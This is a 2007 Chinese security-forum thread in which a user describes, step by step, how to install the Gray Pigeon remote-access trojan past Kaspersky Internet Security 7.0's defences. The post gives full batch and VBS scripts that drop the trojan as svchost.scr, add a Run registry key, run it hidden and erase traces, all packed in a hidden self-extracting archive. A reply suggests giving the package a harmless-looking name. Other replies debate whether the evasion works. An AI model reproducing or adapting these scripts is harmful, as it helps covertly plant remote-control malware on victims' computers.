[原创]完美突破KIS7.0主动防御全开+防火墙高拦截模式{申精}

显示全部楼层 · 发表于 2007-12-1 16:13:04

大家好..我是小东￠酷儿 (通用论坛ID cici584522)
欢迎光临我的BLOG  www.hackhobby.com

=====================================

上次的方法已经完成了对KIS的穿越..原帖:http://bbs.kafan.cn/viewthread.php?tid=154239&extra=page%3D4&page=1(8楼有版主的测试证明回复)

但我并不满足于那个方法..因为把木马放在启动文件夹里始终不好

今天就来个相对完美解决办法..
用到的东西有:

1.灰鸽子木马1个 (单EXE的..不是释放DLL的那种)  [svchost.scr]
2.批处理文件2个 [1.bat /  2.bat]
3.VBS脚本文件1个 [1.vbs]
4.RAR自解压缩功能

木马的配置跟上次不同.上次木马端在启动文件夹里运行..被发现了..删除是很容易的

今天木马终于可以自定义位置了就放 %systemroot%跟目录下(WIN目录)

木马名称为 svchost.scr ,配置鸽子时不选择写注册表.. 但要插IE进程

端口设置为8080或80..

批处理1.bat的内容为

@echo off
@COPY svchost.scr %systemroot%\svchost.scr (将当前文件夹的svchost.scr复制到%systemroot%目录下)
@del /q /f /s svchost.scr(删除当前文件夹的svchost.scr)
@del /q /f /s 1.vbs(删除当前文件夹的1.vbs)
@start shutdown -l -t 0(注销系统,"这一步可以不要")
@del %0(删除自身)

批处理2.bat的内容为

@echo off
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v lin /t REG_SZ /d %systemroot%\svchost.scr /f  (写入注册表.将%systemroot%\svchost.scr 列为启动项目)
@start %systemroot%\svchost.scr(运行%systemroot%下的svchost.scr)
@del %0 (删除自身)

VBS脚本内容为

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c 1.bat",vbhide
(隐藏运行批处理文件1.bat)

===========================================

用RAR自解压缩把 svchost.scr / 1.bat /2.bat /1.vbs 一起做成自解压缩文件..设置为隐蔽运行..释放到启动文件夹

并在解压缩后运行1.vbs

这样..启动文件夹还留了一个 2.bat 等注销后..批处理会比卡巴先运行写入注册表..而且删除自身..自此启动文件夹内干净

了.木马也种在卡巴启动完成之前中植好了.....

                                                                                                   2007年12月1日

此帖在深度论坛已经被加亮

http://bbs.deepin.org/read.php?tid=463915

[ 本帖最后由 cici584522 于 2007-12-1 18:24 编辑 ]

显示全部楼层 · 发表于 2007-12-1 16:14:38

此文章需有一定的计算机基础才能读懂

显示全部楼层 · 发表于 2007-12-1 16:22:59

确实看不懂

而且不知道发卡巴版块有什么用意

显示全部楼层 · 发表于 2007-12-1 16:41:37

附一条.... 自解压缩文件可以取个快速注销.bat 这个名字... PE文件不仅exe可以运行..改成 bat/scr/cmd/com 都可以运行

显示全部楼层 · 发表于 2007-12-1 16:42:15

看了半天都没有看懂~

显示全部楼层 · 发表于 2007-12-1 17:41:43

可以发到hips专区去，那里有不少人测试类似的东西

显示全部楼层 · 发表于 2007-12-1 17:47:24

木马工作时必须插IE进程，而木马不可能仅在卡巴启动前工作，所以虽然感染过程能逃过（只能用逃过这个词）卡巴的主防监控，但在工作时还是会被卡巴的主防发现。

显示全部楼层 · 发表于 2007-12-1 17:54:12

原帖由 浪滔天 于 2007-12-1 17:47 发表
木马工作时必须插IE进程，而木马不可能仅在卡巴启动前工作，所以虽然感染过程能逃过（只能用逃过这个词）卡巴的主防监控，但在工作时还是会被卡巴的主防发现。

灰鸽子工作时..所有行为都是自身的...除了一个远程 telnet要调用CMD外..所有行为都不拦截

只有一个telnet会拦截...但少一个功能也无所谓....这是经过反复测试的

显示全部楼层 · 发表于 2007-12-1 18:03:34

把样本发到样本区让大家测试一下吧。工作时必须同时要过主防和防火墙。

[ 本帖最后由浪滔天于 2007-12-1 18:06 编辑 ]

显示全部楼层 · 发表于 2007-12-1 18:05:36

要测试就来版主跟我测试...测试完成跟上次一样的发出个证明的帖就可以了

(没有经过反复测试的方法..我是不会写成文章发表的)

[ 本帖最后由 cici584522 于 2007-12-1 18:15 编辑 ]

[原创]完美突破KIS7.0主动防御全开+防火墙高拦截模式{申精}

浏览过的版块